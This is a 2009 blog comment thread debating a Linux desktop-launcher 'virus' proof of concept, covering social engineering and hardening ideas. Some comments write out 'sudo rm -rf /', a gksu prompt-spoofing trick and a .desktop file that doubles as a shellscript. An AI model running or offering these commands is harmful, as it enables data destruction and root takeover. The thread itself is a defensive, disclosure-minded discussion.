Micro$oft specifically designs their products toward the lowest_common_denominator intellect in order to maximize their market $hare.

Nothing wrong with that approach (in a business geared toward global domination) of course.

This means that any moron who knows how to read, write, and count to nine on his fingers can install Window$ and operate it as an OS.

That is specifically what net criminals count upon. There is inordinately more money more easily had poaching from the seething masses too dumb to use linux than there is by spending endless hours developing reticulated malware to exploit the desktop of those who have at the least a linux OS and more than likely (by habit and disposition) have additional safeguards (such as differentiated data storage) and probably not much worth stealing or wrecking anyway.

linux is not a guarantee of security but being competent enough to use it is almost in itself a higher measure of some note.

linux (the OSes) lacks the lower_common_denominator impetus Micro$oft has (with the notable exceptions of Ubuntu and, to some lesser extent, RedHat which are somewhat 'dumbed down' in favor of market share). linux software (again with the notable exceptions of Gnome and to a lesser degree KDE) is far less friendly to noobs and stray experimentation. Many packages require not just knowledge but an almost MENSA-level intellectual ability to solve problems in order to be able to use them. Not all, just the ones you desperately need. (need we mention drivers?)

Still, the main points of the article deserves more attention than given by the Ubuntu/Redhat respondents mentioned.

That a virus/trojan can 0wn your system means we who use linux need to raise the bar just a bit higher to avoid the vulnerabilities usually associated with Micro$oft.

x


Comment by seriouslycgi, on 11-Feb-2009 19:03

One thing you pointed out was a logger to gain root. in gnome and kde when the user needs administrative rights it freezes the desktop and pops up a password prompt, what happens here? is there a security mechanism that prevents anything but the application to know whats being typed? or is it just for show? it would be a good idea if there could be a security feature where no shell can "sudo" or "su" unless you opened it from the desktop with a launcher and that password prompt coming up, locking the desktop, and all user applications (including your malware), encrypting the keystrokes at the lowest level (so a logger cant capture it while its frozen :S ), and all this if you are in any desktop environment or X. this would limit the attack to only the user but put inconvenience a little bit ahead, and if there was a key logger they wouldn't get root (in this respect sudo is not safer). in some distros I've seen the launcher for a root terminal that freezes the desktop. make this the only way to get su or sudo in a D.E and the machine is safe from key loggers. I think pretty much nothing can be done to prevent a user from installing/executing their own virus/script apart from attachment scanner and real time scanning of executables and scripts, this is why i left windows, and I don't execute unless I know what it is.


Comment by David F. Skoll, on 12-Feb-2009 00:57

@foobar: I suspect Thunar looks at the "exec=" line and won't start the program if it "looks" funny. Because I tried with a legitimate .desktop file and it launched without incident.

Trying to tell heuristically which desktop files are dangerous and which are not is an exercise in futility. I e-mailed the security contacts at kde.org, gnome.org and xfce.org. Let's see how seriously they take this.

By the way: In my May, 2002 article, I wrote:

"There is a trend under Linux to build complex, rich desktop environments which allow rich interaction between programs. These environments could, if not designed correctly, increase the chances for viruses to execute and propagate. So far, however, the designers of these environments seem to be following sensible design and security procedures. No-one, for example, has built a Linux e-mail client which automatically executes an attachment with just one mouse click."

I guess it's time to delete the last two sentences in that paragraph. :-(


Comment by David F. Skoll, on 12-Feb-2009 01:00

One more thing: This whole fiasco could have been avoided (plus countless lines of coding in Konqueror/Nautilus/Thunar been saved) if the format of a .desktop file had been:

#!/usr/bin/desktop-launch
[rest-of-file-here]
Then you'd just chmod +x the file and file managers wouldn't have to do anything special with it. One of my gripes about KDE and (especially) GNOME is that they almost delight in ignoring decades of UNIX heritage. "Small tools that do one thing well" no longer seems in vogue. :-(


Comment by Sanjaya Yogi, on 12-Feb-2009 02:16

A very interesting post! How about a challenge for everyone, take the opposite approach, and propose step by step "hardening" of the linux host to prevent this type of attack.

I think a whole blog of types of security attacks and their respective defensive counterparts...

Any ideas or links?


Comment by The Open Sourcerer, on 12-Feb-2009 02:18

Thanks for this. It is a very well thought through piece. And something that definitely needs to be looked at upstream by the desktop projects. I will probably cover this on my blog later too.

One way of limiting your vulnerability to "root" attacks is to never run your normal desktop user as the user in the sudoers file. I have two accounts on my Ubuntu PCs. One is my daily working user - no admin/sudo access. The other is just for performing updates and admin tasks etc.


Comment by diddy, on 12-Feb-2009 03:07

I installed wine and then got a friend (network manager) to email me over 100 meg of viruses from his repositry.

I then double clicked on each one trying to run them but not with much luck

I kept getting errors like 'unable to find kernel32.sys' etc errors.

Needless to say my cpu usage went to about 70% but none on my contact list got hit and no files were damaged on my pc.

How boring was that, Why should windows users have all of the fun ?

Still I am glad that I tried it out.

For reference purposes I used viruses like Nimda, sobig etc

did I have antivirus software installed..... nope !


Comment by Felice, on 12-Feb-2009 03:20

Sorry, but I find the whole story pointless. There will never be any protection against the user's stupidity, and given some stupidity for granted, there are much less complicated ways of damaging a computer.

You can just prepare a professional looking web page and offer a very interesting .deb or .rpm package to be downloaded and installed. For instance a special codec to see a short video in an unusual format.

If the description is clever enough, the stupid will install, and BANG!

Are we only and exclusively installing packages from the official distribution page ? Me not, I would never copy an attachment from "somebody" to my desktop and open it, but I could easily try an interesting utility from the so called "community". Even if distributed as source code. (Do we all carefully read and understand a 100k C source before compiling ?)

On the other side, Linux is very different from Windows in that you cannot easily and silently infect a PC just passing by a malicius web page while surfing. This is the REAL danger, what works underground without your intervention at all. From this point of view, I feel quite safe.

About my percentage of casual user-stupidity, like deleting important files, formatting the wrong partition, downloading a cosy utility etc etc, I simply take it into account. For such cases, only a good and multi-stage backup system can protect my PC from myself.


Comment by Diego L Espiñeira, on 12-Feb-2009 03:27

In my opinion, the root of the problem is in the combination between software and people beliefs.

Source code and software changes a lot faster than the people beliefs and conceptions.


Comment by Phil, on 12-Feb-2009 03:46

You seemed to have gone through a lot of trouble and explanation for nothing unless theres is something I'm not thinking about.

Your attack is based on the idea that a person will foolishly click on something or follow the instructions in an email. If the user is that naive then why do you need all these methods to attempt to mask what you are doing. This same user would most likely save and click a .DEB or .RPM, enter their password if requested and let it install. They don't know what its doing. I remember also seeing the web .DEB install that lets you click on a link in a web page and go straight into the package manager. An HTML email would accomplish this. Or why bother tricking them with a launcher. Simply put in the email that they must right click and check the make executable box on the permissions tab. Thats no different than the instructions that tell you to click run in Windows or click the yellow bar at the top of IE.

It really does seem that this article goes out of the way to try and find some covert attack methods just to say Linux is not secure when there are much simpler ways to accomplish the same task. Any system that allows someone to execute something can be hacked. In essence the system is only doing what you asked it to do. There aren't many ways for it to determine that this is not what you really wanted it to do except for asking and even then a user can continue to say yes due to lack of understanding or a burning drive to see the nude photos. If you ask a computer to install malware then it will.

However I still believe that Linux may be better suited to deal with this issue though it can never completely be eradicated. For instance wouldn't it be simple to fix the laucnher issue by forcing them to respect file permissions and not execute a script that does not set to be executable? But even still you will always have the stupid user that will go and make the script executable. Once again a computer will do what its told.

I'd also like to know how well SELinux and AppArmour are able to protect against these types of issues. They are hard to configure now but what if standard profiles were kept in repositories and updated as new malware threats are discovered.


Comment by Maternitus, on 12-Feb-2009 03:51

Thank you for this interesting article. I use Linux for quite some time (7 years) and I know that there are virusses for Linux. And lots of them.

Years ago I read an article about the virus-subject and the author totalled the amounts of virusses that were known for every OS (and appeared just that year).

Linux won, but after that, rather depressing, list the author also explained why that was. Alot of virusses for Linux are made just to test out the weak spots, in order to improve them and make them resistant for it. From the perspective I just felt more secure, because I knew that in the Linux communtity the reaction speed to fix any vulnerability is high.

But anyway, I never understood how such a thing was made and it taught me some insight on the workings of the OS. It will help me using the software in a better and even more responsible way.

Thanks again.

Maternitus.

PS Before I switched 7 years ago, it was Windows that slowed down my machines, so as a second nature I still never open any attachments from email, except the mails from those I trust... In that way Windows can be a good thing, how evil it even may sound. ;-)


Comment by Caleb Cushing, on 12-Feb-2009 03:58

All this is true, but linux does have some advantages... in linux viruses are easier to clean up, at least if they don't get root. that wouldn't make them any less pesky for users... but a tech would have less problems cleaning them up.

a /tmp virus can be prevented by making a separate /tmp partition an making it noexec. actually... I think... it might be possible to mount /home as noexec. I should try it and see if I have any problems.


Comment by Pablo Manuel Rizzo, on 12-Feb-2009 04:01

jajaja! That's not a virus!


Comment by CT, on 12-Feb-2009 04:14

Nice article, but it's a bit late, don't you think? For the last 10+ years the rumor of "no Linux virus" has continued. If you can script and know the ins and outs of the Desktop GUI, then you can create bugs easily. The key, as you mention, is that the core (the OS itself) is separate, and therefore more secure. And so on ...

Anyway, this a well written piece and I do think that new users need to be reminded constantly to not turn a blind eye to security.


Comment by Charly G., on 12-Feb-2009 04:37

Just wondering... why e-mail clients don't issue some kind of warning when an attachment has multiple dots in its name? It doesn't solve the problem, but at least gives a little more awareness.


Comment by s.plisskin, on 12-Feb-2009 04:43

So basically he is saying Gnu/Linux can be infected if the user bends over backwards to allow it to infect his system by running through several hoops to accomplish.

Anyone this stupid deserves to be infected.


Comment by hoho, on 12-Feb-2009 05:33

wow what a virus, i wrote a new one:

enter irc #ubuntu channel and tell a newbie:

write in a console

echo "im going to see a nude woman"; sudo rm -rf /


Comment by ken, on 12-Feb-2009 05:44

Nice! You have just done what the news today tells Al Qaeda! Exactly how they can bring down the US.

So why not you tell how we can bring down linux.

anybody using linux that really understands will then no this will be the perfect breeding ground to launch and receive from. Far easier than writing one for windows. You don't need to be root and you don't need 5 easy steps. Those who no will tell you 1 step is all you need. You say that can't be? think again.

All these linux distro's will then have the sheet pulled right from underneath them

Trust me, its just that easy. so easy that all it will take is just 1 person with enough nerve to follow through. Or one person to discuss it........


Comment by lalan, on 12-Feb-2009 05:52

Great article!

I think that someone who tells that he never thought that Linux is "virus/mallaware/trojan" free is lying.

I think that KDE control center or kpackage for example have a great approach to deal with "gksu stuff". They call the KDEsu from the app only when you need root privileges. Doing this you cannot insert the script to run as root.

Despite this, it true that root privileges are not the only way to make some trouble, totally agree.


Author's note by foobar, on 12-Feb-2009 06:27

@David F. Skoll: I like the idea with #!/usr/bin/desktop-launch. Very *nix-ish. Or at least execute bits.


Author's note by foobar, on 12-Feb-2009 06:29

@The Opensourcerer: About not running your normal desktop user in the sudoers file. Good idea! Sadly just not the default in a popular distro like Ubuntu. And of course that still doesn't protect you from being infected (on the user level), since you don't really need root.


Author's note by foobar, on 12-Feb-2009 06:35

@Felice and @Phil: You are both suggesting that what I am describing here is overly complicated and that instead a user could be infected by a well-written .deb or .rpm file that is offered for download on a web-site. How did that user get to the web-site, though? An email with a link in it? Anyway...

You are both missing the point.

In order to install anything on Linux you will need root or at least sudo. Thus, any attempt to do this will prompt you for your password. It is also easily rendered useless by a properly managed security policy within a large enterprise, whereby desktop users are not in the sudoers file. Instantly, your entire .deb and .rpm based scheme fails.

What I outlined here does not require ANY sudo or root privileges in order to still successfully infect a machine (or at least a user's account). The discussion about getting the root password was moved into an appendix, since it is not relevant for the working of the actual infection.


Author's note by foobar, on 12-Feb-2009 06:37

@Caleb Cushing: Linux does not only have 'some' advantages, it has many!

But making /tmp noexec isn't important and also doesn't prevent anything. See in the step-by-step guide? There the bash commands create the drop-directory first within the user's directory, so /tmp is not needed at all.


Author's note by foobar, on 12-Feb-2009 06:39

@ken: So, not telling is better than disclosing? That's called 'security through obscurity' and it doesn't work...


Author's note by foobar, on 12-Feb-2009 06:42

@Pablo Manuel Rizzo: Jajaja! We know all that! Please consider some of the other comments about that topic.


Comment by David F. Skoll, on 12-Feb-2009 06:55

So... it turns out this attack was pointed out by Jon Corbet in 2006: http://lwn.net/Articles/178409/

Unfortunately, the desktop environment developers ignored that and chose convenience over security. I guess they were just copying Micro$oft.


Comment by whatever, on 12-Feb-2009 07:06

Launch a file by association? Wow... You are brilliant. /sarcasm... You are about 15 years behind...All of these can be turned off.


Author's note by foobar, on 12-Feb-2009 07:26

@David F. Skoll: Yes, I had just found out about that myself. See the 'update' notice I added at the end of my article.


Comment by Mackenzie, on 12-Feb-2009 07:43

Well jeez, might as well just send an email that says:

"forward this message to 10 people then do 'sudo rm -rf /' and you'll get 10 years good luck!"

And claim that's a virus too.

Most Linux desktops are not as stupid as Windows desktops. They don't have a mail server running on the box, so how would it procreate again?

And by the way....talking about viruses and yet you require Javascript? Seriously? Anyone even remotely security-conscious knows Javascript is something you don't want to have enabled.


Comment by Mackenzie, on 12-Feb-2009 07:49

Also, this would be a trojan not a virus. Viruses are written by people that have found real remote exploits. Trojans are written by those who give up on finding a remote exploit and resort to social engineering.


Comment by Mackenzie, on 12-Feb-2009 07:51

Maternitus:

Those are Proof of Concept viruses. They were never in the wild. The total count for in the wild viruses for Linux is less than 30, I believe. They also have an average infection rate of something like 20 machines.


Comment by bud freeman, on 12-Feb-2009 08:23

(yawn) Another suppos-ed , self-professed security professional who claims that he knows the difference between a malicious script and a virus, but since the media has muddied the waters, you can perpetuate the confusion, too.

That attitude speaks volumes towards your credibility as an expert in security.

(yawn) As more people adopt Linux, the bad guys will be more likely to target Linux.

As more people adopt Linux, its security is more likely to be improved, since it's open source, and it's flaw are more likely to be discovered and fixed (since there are more bad guys than good guys)

Here's a script, 2 lines, that if you can trick someone on any Linux system, with passwordless sudo, to run, that will wipe their system:

#!/bin/bash
sudo rm -rf /*

Which begs the question:

So what?

At the end of the day, you're saying that Linux is not secure because you can fool people?

(yawn)

cheers,


Comment by Flimm, on 12-Feb-2009 09:41

It's worse then that. You can make gksu tell you it's running a program when it's actually running another.

$ echo "[Desktop Entry]" > ~/fake.desktop

$ echo "Name=/usr/sbin/synaptic" >> ~/fake.desktop

$ gksu --desktop ~/fake.desktop virus

The last command would only tell you:

The application '/usr/sbin/synaptic' lets you modify essential parts of your system.

Insert that command into synaptic.desktop, and a user would never notice the difference until too late.


Author's note by foobar, on 12-Feb-2009 10:04

@bud freeman: Sorry, but you are the one who is boring here.

Firstly, the point of the article is that the user does NOT need to know how to start a shell or set execute bit. The non-technical users who are vulnerable here don't know how to do that! Did you miss that completely obvious point, which most other readers instantly understood?

Secondly, you can comment on my credibility as a security expert (which I never claimed I was) all you want. Until you are able to get a simple point like the one above - or actually read the full article - you are the one without credibility, since you are appearing very dense indeed.

Get off my lawn!


Author's note by foobar, on 12-Feb-2009 10:07

@Mackenzie: As mentioned earlier: Telling people in an email to open their terminal and type stuff, and expecting them to know how to do this, is not going to help your attack. Firstly, your example sucks because it assumes that people properly know how to order this: FIRST send ot the emails, THEN erase your own harddrive. Think about the details, please.

Also, before commenting, please read the entire article. If you would have done that, you would have discovered that I am explicitly addressing this 'most Linux users are not as stupid as Windows users' argument.

Come back once you have read that, please.


Comment by TripleII, on 12-Feb-2009 10:27

You don't know what a Virus is. A virus is a piece of software that installs, propogates/replicates on a users system with no user intervention through a security exploit in a program or the underlying OS itself.

http://en.wikipedia.org/wiki/Computer_virus

A computer virus is a computer program that can copy itself and infect a computer without the permission or knowledge of the user.

You have outlined a possible way to more easily write "malware" which requires user intervention, and as outlined a whole host of conditions, etc. You should update your title though, this is as much a virus as "hit your own head with a hammer" is a stealth way to get the user to be hurt.

TripleII


Comment by TripleII, on 12-Feb-2009 10:45

And to be fair, on Windows, where people do a disservice mixing and matching Virus with Malware/Trojan with Spyware all rolled into a "Virus" as if they are all the same results in an inability of users to prevent infections. A very large percentage of "Viruses" on Windows are actually malware programs, but since they are called Viruses, they NEVER LEARN that it wasn't a deficiency in AVG but their own unwitting installation of the trojan.

You may pooh pooh this as a silly distinction but I have known users who actually BELIEVE that their AV scanner means they can install anything since, if it is Virus infected, their AV program will detect it and they are fine. Since it's all "A Virus" (when discussing the entire spectrum of online threats) they are free to "do anything" as long as Norton is up to date.

Now, whether you can see the above or not, and you do create very valid points in malware production, Geeks need to be technically accurate.



TripleII


Author's note by foobar, on 12-Feb-2009 11:04

@Triplell: Read my reponse to your comment in the follow up [ http://www.geekzone.co.nz/foobar/6236 ] , please.


Author's note by foobar, on 12-Feb-2009 11:07

@s.plisskin and @hoho: You are not getting the point: The article describes how a user can be infected WITHOUT bending over backwards and without having to know how to start a shell.

How many times do I have to repeat that? Any step that you can take away from the infection makes it easier and more successful. Non-technical users don't know how to run the shell, so this here is definitely making an infection easier.

My goodness, people. Wake up!


Comment by SPM, on 12-Feb-2009 12:27

You are talking about trojans here not viruses. The problem with viruses on Linux (or Unix or Mac or BSD for that matter) is that there aren't any that have been successful at replicating in the wild - EVER. Not a single one. Of course that is not an excuse for complacency.

The bottom line though: the proof of the pudding is in the eating.


Comment by Shane Kerns, on 12-Feb-2009 13:05

Nice introductory article on the security issues of Linux. I have been a Linux junkie for over a dozen years now (self proclaimed of coarse )and I must admit that you make very valid points. Although you must have realized that whatever you have mentioned here is a function of user ignorance.

What you should focus on is the fact that MS products are more susceptible due to the fact that they can execute any code or executable as any user. Their kernel is built that way.

No one suggests that Linux is 100% virus or trojan or malware free. To make my point lets say that half the servers in the world ran XP/Vista servers and half the world ran Linux servers (pick you distro and make each group as secure as you possible can) now which half do you think would be hacked first and what do you think would be the time lag between the 2 groups.

My guess (and personal experience) is that it would take about a week longer to break the security of a Linux server.

People say there are far more personal computers running some Windows OS than there are people running a Linux OS which is why more Windows PCs are hacked, but what do you have to say about the server side. The opposite is true when it comes to servers yet more Windows servers are hacked. Why do you think that is?


Comment by oiaohm, on 12-Feb-2009 13:43

Ok someone missed a protection. .desktop file through email client is quite simple to prevent. Filtering.

Thanks for a great article. Mind considering get it included in this http://www.linuxsecurity.com/resource_files/documentation/virus-writing-HOWTO/_html/index.html .

Its basically a reference document that is used when designing Linux secuirty.


Author's note by foobar, on 12-Feb-2009 13:53

@oiaohm: Actually, please see the follow up: The .desktop extension is not strictly necessary for this to work.

Sure, please feel free to include a link to the article in the virus-writing-HOWTO.


Comment by roger, on 12-Feb-2009 18:11

Why is it so damn hard to make a virus infect a desktop machine? I lost interest before barely reading through half of the article! Its sounds so complicated.


Comment by Mackenzie, on 12-Feb-2009 20:31

@foobar:

I did read it. The point is, this is NOT A VIRUS! At least change the title to say "Linux trojan" so you're factually accurate!

Social engineering is not a technical problem. It is a human problem. This thus has nothing to do with the OS or desktop environment. I was trying to demonstrate that all you're doing is telling someone "please do something stupid for me" and hoping they comply.

Yeah yeah I saw the bit about Linux users being as stupid as Windows users. I'm not disputing that there are computer illiterate folks on every platform. Hell, my mom uses Linux. That's NOT the point though, because stupid users are not the OS's problem. Stupid users are their own problem. They'll end up as candidates for the Darwin Awards anyway.


Comment by Matias, on 12-Feb-2009 22:08

I have strongly critisized virus/malware/worms-issue coz actually much bigger problem for desktop/laptop computere are "normal" bugs.

This hysteria is rather similar than this painfully boring "man-made global warming" issue. Only winners are those norton's or f-secures's etc who are leading this bandwagon. BTW i agree the critics against "windows-style" filemanagers and desktops. Now i undestand why my teacher of C/C++ was so furiously against graphical "nice looking" desktops. Mouse-clicking "liberty" is just pain is ass.


Comment by Romanic, on 13-Feb-2009 00:25

An interesting article, thank you. 

"* Linux as the core OS is more secure"

Out of curiosity, what is your data or reasoning for that?

Architecturally, since NT, Windows seems to have had a good security model and MinWin seems to be a positive change. Other security measures seem to keep improving too. 

Since Vista, the much-maligned UAC has made running as standard user fine, even with all the poorly designed software out there which relies on administrator privileges.

"The hapless user double-clicks on the attachment, which Windows – in the absence of some decent anti-virus software – will obediently execute."

My mail app has prevented this for a long time. Now there's UAC too.

"Often, the published vulnerability list for Linux includes those of the many available or bundled apps, while those for Windows only include those of the core OS, that should also be taken into account."

For interest, here's a comparative OS security report that splits out the bundled apps to be equivalent to Windows.

-

Disclosure: It matters to some people, so I'll mention that I work for Microsoft in NZ. My opinions are still my own. I hope. :-)


Comment by g fernandes, on 13-Feb-2009 00:38

As pointed out in the LWN comments (http://lwn.net/Articles/318755/), the gksu hack won't work on Red Hat family systems.

Also, one must remember that at the end of the day, no amount of good engineering (in an OS, DE or any other software program) will do away with the danger of social engineering attacks.

Your "virus" effectively exploits PIBKAC, as do phishing attacks etc. The solution is not imprisoning the user's flexibility on a DE/OS. The solution is user-education.


Comment by Daniel, on 13-Feb-2009 01:47

Well, your method is far more overcomplicated imho.

It is much more simple to create a script (can be obfuscated enough to hide its real job), send as attachment and ask the user to run it even with root privileges. No need to mess with .desktop files.

"Against stupidity the gods themselves contend in vain."


Comment by alinuxuser, on 13-Feb-2009 02:33

I love that article! Here is my recipe for a virus:

1. Buy a 2 kg steel hammer and a box

2. Use the hammer to hit one of your fingers (your choice which one)

3. Put the hammer and the printout of my recipe into the box and send it to somebody.

4. IF the recipient is stupid enough to open the box, read the recipe and execute it we have the REAL LIFE VIRUS!

There is no way you can protect someone from shooting his own foot if he really wants to do it! Is it normal practice that you're saving/executing whatever comes to your email box?

--

www.pld-linux.org


Comment by Maxo, on 13-Feb-2009 03:08

I had already thought about this too. I don't see it as a big deal at all. The idea that a user can install software at a user level that can do what it wants within that user level is not a big deal and I would not want an OS that prevents that.

One thing you may not have thought about, at least I had not, is that the malware could use a keylogger to caputre the password when a user tries to run something like Synaptic, and then it would have full root to do whatever it wanted.


Comment by Colin, on 13-Feb-2009 05:12

This is how Thunar does:

http://www.google.com/codesearch/p?hl=en#06L7Y7xwnvI/Thunar-0.8.0/thunar-vfs/thunar-vfs-io-local.c&q=x-thunar%20suspected-malware

Looks whether the file tries to look like another mime type.


Comment by asr, on 13-Feb-2009 05:20

Hey

I found the way to turn the .desktop file into an executable shellscript by itself, thus you don't need to wget the script:

========= file test.desktop =============

Ignore= /tmp/x2 ; sh /tmp/x2'
Icon=x-office-document
Type=Application
EOF
# Anything from here is run as a regular shellscript
# by asr
echo 'PWNED!!!!!!' > /tmp/lol

===== end of test.desktop =========


Comment by asr, on 13-Feb-2009 21:08

Mi previous message has been garbled by some text filter :(

It should start by Ignore=<

and then a regular .desktop, plus EOF, then the shellscript


Comment by m0rebel, on 14-Feb-2009 15:16

Nice article! I saw you added an update saying you're surprised if you came up with these attacks on your own. I haven't thought of the gnome and kde desktop launchers, but just a couple days ago when I started my own blog I posted about the changing the path to sudo trick here: http://blog.banditdefense.com/2009/02/06/sudo-install-my-rootkit/


Comment by Benjamin, on 14-Feb-2009 23:51

Thanks a lot for opening my eyes ! I was like almost everybody "I don't care about security in Linux, it's so safe....well, my foot !"

Can I translate your article for my french Linux blog please (in order to make frenchs aware of this) ?

Anyway thanks a lot for this article !


Comment by Gnothi, on 15-Feb-2009 01:56

Why do FUD-meisters abandon common sense when talking about Linux?

Never download and run an untrusted file. PERIOD.

No friend, no law, and no OS can protect someone from their own stupidity. This so-called flaw resides between the keyboard and the chair (i.e. the end-user), not within the PC.

Next, foobar will write a glowing endorsement of the surveillance and censorship spyware (DRM) that's built into the Windows 7 kernel, which allows Microsoft to police whatever you're doing with your PC. Yeah, let Big Brother protect you from yourself!

;)


Comment by Gurgle, on 16-Feb-2009 02:56

Are we heading towards AV packages running on Linux then?

Would an updated AV help stop this 'file' getting onto your system in the first place (once the 'file' is known)?


Comment by Tutal Kaboo, on 16-Feb-2009 14:02

I thought a couple of things (that I do) helped prevent me from being susceptible to viruses.

1. I'm never logged in as root/administrator unless I want to do something specific that requires that privilege

2. I'm not part of the Administrators group on Windows and I'm not in sudoers on Linux

But, your article points out that my machine need not be infected, it is sufficient if my account is infected.

Great article!


Comment by rüya tabirleri, on 16-Feb-2009 22:53

thank you

really nice sharing

replicate this type of quality web sites have to think


Comment by Dutra de Lacerda, on 18-Feb-2009 09:01

The 1st OS I have used, was a UNIX version in a MultiUser environment.

I build a viral script to get control over my mates resources. The main reason was to avoid them to do that to me. Never really used it to profit time-share.

This was in 1993. And never exploited other possibilities, neither evolved after that as the purpose was just to be defensive, and just for a small period of time.

I've moved to DOS in PCs. Much faster environment, even with the old 8086 CPUs.

This just proves the point.

And reminds there's NO secure system, if it has flaws (build or in the configuration).

Assuming security because the alternatives are known as insecure, is an invitation to serious problems in future (unawareness is NOT safety, just a pleasant state in illusion)


Comment by ethana2, on 18-Feb-2009 09:21

I have a ~/.bashrc packed full of handy quick system administration commands.

..I chown'ed it root.

....it should ALWAYS be owned by root; that's a dangerous file for the user to own.


Comment by manuel, on 18-Feb-2009 09:29

Wouldn't setting the attributes "noexec, nosuid" on the /tmp and "/home" partitions help to circumvent the issue?

If so, it could become the default behaviour of most Linux distro's installers.

As far as I'm concerned, I set those on the "/home" partition for I consider a regular user doesn't have to execute things/apps/scripts from its own "/home" folder!

I did this for my wife's computer as she is unaware of the potential risks... worse, she doesn't want to know... for her the computer must just work and the rest is none of her concerns...

Now that I've read your excellent article, I'll also protect the "/tmp" partition.

Thanks for the brilliant demonstration!

Cheers,

Manuel


Comment by Anonym, on 18-Feb-2009 10:14

OMG... "How to write a Linux virus" and then you are talking about _Desktop envinronments_ not about Linux operating system!

The Linux kernel is THE operating system. Nothing else belongs to operating system than the Linux kernel itself. If you want to write a malware for operating system, it should infect the Linux kernel, what is the operating system.

But I give you way to escape by assuming that you meant "How to write a virus in 5 easy steps what can be ran by Linux, SunOS, FreeBSD and many other Unix/*nix operating systems".

The most important, and the only important is that this is about Gnome and KDE functionality to run .desktop files. Not about Linux operating system running those, because the OS still just executes all the code what the other softwares ask it to do.

Do not spread the political and marketing propaganda about "Linux" or "Linux operating system" being more than the monolith kernel itself. That is very stupid and lame.


Author's note by foobar, on 18-Feb-2009 11:02

@Anonym: Did you even read the article? Probably not very thoroughly. Firstly, I am stating there very clearly that I am talking about Gnome and KDE vulnerabilities. Secondly, if you look at what commonly is called 'Linux virus/worm' or 'Unix virus/worm' (go ahead, google it!) you will find that most (all?) of them are exploiting a vulnerability in a server process or some other program that is run on top of the OS. Yet, they are called a 'Linux worm/virus' or 'Unix worm/virus' because it impacts systems with those OSs (which run those apps, of course).

So, next time please stop and think for a second before you start typing...


Comment by Matthew C. Tedder, on 18-Feb-2009 13:05

Here's one of your bugs: Between the "curl" and "python" commands, you'll need "&&" and not just ";"..

This isn't exactly a big insight--I'm sure just about anyone who has pondered writing malware for Linux has gone down this lane. It's obvious.

The main problem with it (besides your own bugs): With each step or pre-requisite tool, you loose exponentially more possible targets. You'd be very lucky to get one person infected out of any user's email list.

(1) How many people will download onto the desktop and click on the link..

(2) How many people have curl installed..

(3) How many people have python installed..

(4) How many people are using a mail client that uses the mailbox standard for reading in the address book?

Automatically installing the pre-requisites would require sudo (hence root privileges).

I think it is a good idea that the standard for desktop links between KDE and GNOME also require to be executable... But even without, you cannot realistically expect any growth in the spread of your trojan.

You might fool a buddy or two... someone who knows and trusts you.

Matthew


Author's note by foobar, on 18-Feb-2009 13:17

@Matthew C. Tedder: Sorry Matthew, but you are mistaken. Several times.

1. No, I don't need a '&&'. I don't know which shell you are trying or what exactly you have typed in, but this works exactly as I wrote it for me and it does so on several standard installs (Ubuntu, Kubuntu and Fedora).

2. Who has curl or wget installed? Most distros. At least those that matter as far as market share is concerned: Ubuntu, Kubuntu, Fedora. I'm sure SuSE has something like it as well.

3. Who has Python installed? Again, almost everyone. I don't know which distro you are running, but all those that I have checked do. And my goodness: Does the term 'proof of concept' mean anything to you? Use bash programming if you like that better. I'm sure that's installed everywhere.

4. Huh? I don't even know what you are talking about. But I do know that I can write a single shell line, which reliably extracts all email addresses that I have ever contacted from my mailbox. I don't need the address book if I don't want to. And I can just run that single line against ~/.evolution, ~/.moxilla-thunderbird and some of the other common places in which one finds emails.

As outlined above, in the very most cases I don't need to install any prerequisites, thus, I don't need root.


Comment by Toxic_Shock, on 18-Feb-2009 14:00

I guess it is time to reform the desktop environment...

1) Remove the heavy integration from the desktop environment. It violates the Unix philosophy of 'one program per task' spiel. I agree, leave the double click and your problems are solved for windows users.

2) More advanced policies on execution. Like SELinux and Apparmor, something should be running that prevents programs from messing with directories they have no business in. If those policies are too hard to maintain, then maybe linux isn't for you. However, since programs can do so much, they would naturally have more directory access.

I'd hate to see a world where Linux users are running virus scans and spyware scans.

If the current desktop projects refuse to consider this, they should be abandoned by security aware users in search of or in quest to create a desktop environment will all the security considerations in mind.

Ease of Use often destroys security.


Comment by Nacho, on 18-Feb-2009 14:25

Interesting article, no matter what a few guys want to discuss ;-)

But please... change the CSS for printing. I wanted to keep it for online reading, and the main article (with no comments) took over 22 pages! ;-)


Comment by tantris, on 18-Feb-2009 16:00

"Truly, on a desktop system that is normally just used by a single user owning that user account is pretty much equivalent to owning root, as far as doing damage is concerned"

Exactly. And that has been bothering me for quite a while. What one usually reads is the mantra about not being able to take over the system, only user accounts, very safe, blala...

That's fine for a multi user system, but for a desktop system I don't care that much about the OS (I got a clean copy on CD), nor downtime, but my files in userland.

With more and more people using Linux and more and more programs using scripts, the risc will increase. It doesn't have to be a desktop icon, it could also be a malware script for firefox (the cool new toolbar), some runaway java, that exploits a bug, a addon for evolution,...

Maybe web applications shouldn't run as user at all. No desktop user rights, no script problems.

They could be in my group, so I can read the files, but have no write access outside of their subfolder.


Comment by Shane Spencer, on 18-Feb-2009 17:21

Rinse/wash/repeat for any other OS. How is this news?


Comment by Dave, on 18-Feb-2009 20:39

Interesting points. Definitely a flaw in the FreeDesktop spec, if you ask me... And the immediate fix response I have is the same as yours -- require .desktop files to be executable. I don't think that's a bad idea at all. The only problem is that a .desktop file would then need a hash-bang or it will be interpreted by /bin/sh. Minor, but it means having to tweak every .desktop file out there.

Also, the problem of gaining root is simplified by a smart app which waits until some other app requiring root has been launched with gksudo (as is update-manager, for instance). The idea behind sudo (and gksudo) is that if you've authenticated, you shouldn't need to re-auth for a period of time after the last time you needed to. So if you perform a gksudo-based operation every 5 minutes, you will only have to auth the first time (default window is 15 min, iirc). A smart py app could wait until one of these more well-known apps is running before attempting its nefarious actions via a quiet sudo.


Comment by Azrael, on 18-Feb-2009 22:48

synaptics != synaptic.

Synaptics is a touchpad driver, Synaptic is a GUI deb package manager.


Comment by Daniel, on 19-Feb-2009 00:52

Whew, for a moment I thought this was actually going to be something to worry about. No operating system can be hardened against social engineering. When you come up with a way to infect my Linux system with no interaction on my part... then I'll start to worry.


Comment by Jamster, on 19-Feb-2009 01:27

Thanks for this informative article!

It's sad that so many people start falling back into bite reflexes as soon as they see an article that might even remotely criticize something about any part of Linux software or users. It's also funny that 90% of them show that they haven't even fully read the article, while waving around their 'Durr, you're so stupid but you can prevent it via X Y and Z!' Congrats. You're not who this article is about. But you'd have known that, had you properly read it.

